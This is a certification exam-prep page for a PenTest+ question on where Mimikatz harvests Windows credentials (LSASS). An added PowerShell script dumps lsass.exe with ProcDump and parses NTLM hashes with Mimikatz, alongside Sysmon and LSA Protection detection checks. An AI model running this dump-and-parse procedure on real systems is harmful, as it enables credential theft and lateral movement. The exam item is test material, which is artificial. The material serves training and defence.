
PT0-001 · Question #147

PT0-001 Question #147: Real Exam Question with Answer & Explanation


Post-exploitation and lateral movement

Question

Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

Options

  • A. LSASS
  • B. SAM database
  • C. Active Directory
  • D. Registry

Explanation

The correct answer is A: LSASS. On a running Windows host, the Local Security Authority Subsystem Service (LSASS) keeps the material for every interactive and service logon in its process memory: NTLM hashes, Kerberos tickets and keys, and, where WDigest caching is enabled, plaintext passwords. Mimikatz's sekurlsa module (sekurlsa::logonpasswords) reads that memory directly. Doing so requires SeDebugPrivilege, i.e. local administrator or SYSTEM on the box, so the "escalation" in the question is not Joe's rights on this host but the reach of what he harvests: hashes and tickets of other users, frequently domain or service accounts, that he can then pass or replay elsewhere.

A common way to avoid running Mimikatz on the target at all is to dump the LSASS process from memory to disk with Sysinternals ProcDump. Because ProcDump is a signed Microsoft utility, AV has historically been slow to flag it; note, though, that a non-LSASS process opening a read handle to lsass.exe is now a standard EDR and Sysmon (Event ID 10, ProcessAccess) detection, and LSA Protection (RunAsPPL) or Credential Guard will block or empty the dump. ProcDump writes a memory dump (.dmp) of the process, which is copied off the host and loaded into Mimikatz offline with sekurlsa::minidump, after which sekurlsa::logonpasswords extracts the same credentials it would from a live system.

The other options hold credentials too, but not the ones this technique reads: the SAM database (and the registry hives that store it) holds local account hashes, which Mimikatz reads with lsadump::sam, and Active Directory (NTDS.dit on a domain controller) holds domain account hashes, reached with lsadump::dcsync or an offline NTDS extraction.
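The procedure above written out end to end, as an added PowerShell example that is not from the exam page nor from the Sysinternals or Mimikatz projects. It assumes an elevated session (SeDebugPrivilege), procdump.exe and mimikatz.exe in the current directory, a writable C:\Temp, and, for the defender side, Sysmon installed with ProcessAccess logging; the function names, paths and output parsing are illustrative choices of this example, not conventions of either tool.

```powershell
# Added example, not from the exam page. Assumes an elevated session, procdump.exe and
# mimikatz.exe in the current directory, and a writable C:\Temp. Function names, paths and
# the parsing below are this example's own choices.

# --- Tester side: dump LSASS with a signed Microsoft binary, parse the dump offline ---
function Invoke-LsassDump {
    param(
        [string]$ProcDump = '.\procdump.exe',
        [string]$DumpPath = 'C:\Temp\lsass.dmp'
    )
    # Opening lsass for PROCESS_VM_READ needs SeDebugPrivilege, so refuse to run unelevated.
    $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()
               ).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    if (-not $isAdmin) { throw 'Dumping lsass requires local administrator (SeDebugPrivilege).' }

    # -accepteula suppresses the EULA prompt; -ma writes a full memory dump, which is what
    # sekurlsa::minidump needs (the default reduced dump lacks the credential structures).
    & $ProcDump -accepteula -ma lsass.exe $DumpPath | Out-Null
    if (-not (Test-Path $DumpPath)) { throw "ProcDump did not write $DumpPath (LSA Protection enabled?)" }
    return (Get-Item $DumpPath)
}

function Get-CredentialsFromDump {
    param(
        [string]$Mimikatz = '.\mimikatz.exe',
        [string]$DumpPath = 'C:\Temp\lsass.dmp'
    )
    # Each argument is one mimikatz command; a trailing 'exit' keeps it non-interactive.
    # sekurlsa::minidump points the sekurlsa module at the dump file instead of live lsass.
    $out = & $Mimikatz "sekurlsa::minidump $DumpPath" 'sekurlsa::logonpasswords' 'exit'

    # Collect the fields a tester actually reuses from the msv blocks: Domain\Username + NTLM.
    $creds = @(); $user = $null; $domain = $null
    foreach ($line in $out) {
        if     ($line -match '^\s*\*\s+Username\s*:\s*(.+)$')        { $user   = $Matches[1].Trim() }
        elseif ($line -match '^\s*\*\s+Domain\s*:\s*(.+)$')          { $domain = $Matches[1].Trim() }
        elseif ($line -match '^\s*\*\s+NTLM\s*:\s*([0-9a-fA-F]{32})$') {
            $creds += [pscustomobject]@{ Domain = $domain; User = $user; NTLM = $Matches[1].ToLower() }
        }
    }
    return $creds | Sort-Object Domain, User, NTLM -Unique
}

# --- Defender side: the same action seen from the host ---
# Sysmon Event ID 10 (ProcessAccess) with lsass.exe as TargetImage is the canonical signal;
# a SourceImage of procdump.exe, or any non-system binary, with VM_READ in GrantedAccess is
# what the dump above produces.
function Find-LsassAccess {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10
                 StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $x = [xml]$_.ToXml(); $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if ($d.TargetImage -like '*\lsass.exe') {
            [pscustomobject]@{ Time = $_.TimeCreated; Source = $d.SourceImage
                               GrantedAccess = $d.GrantedAccess; CallTrace = $d.CallTrace }
        }
    }
}

# LSA Protection: with RunAsPPL = 1 a normally signed process such as procdump cannot open
# lsass for reading at all, so Invoke-LsassDump above fails before any credential leaves memory.
function Test-LsaProtection {
    $v = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name RunAsPPL -ErrorAction SilentlyContinue
    return [bool]($v -and $v.RunAsPPL -eq 1)
}

# Usage (tester): Invoke-LsassDump; Get-CredentialsFromDump | Format-Table
# Usage (defender): Test-LsaProtection; Find-LsassAccess -Hours 48 | Format-Table
```

Keeping the dump-and-parse split mirrors how this is done on an engagement: only ProcDump touches the target, and Mimikatz runs on the tester's machine against the copied .dmp. The two defender functions show why "AV doesn't trigger on ProcDump" is only half the story: the handle open is logged regardless of which binary performs it, and LSA Protection stops the read outright.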

Topics

#Mimikatz #LSASS #credential harvesting #privilege escalation
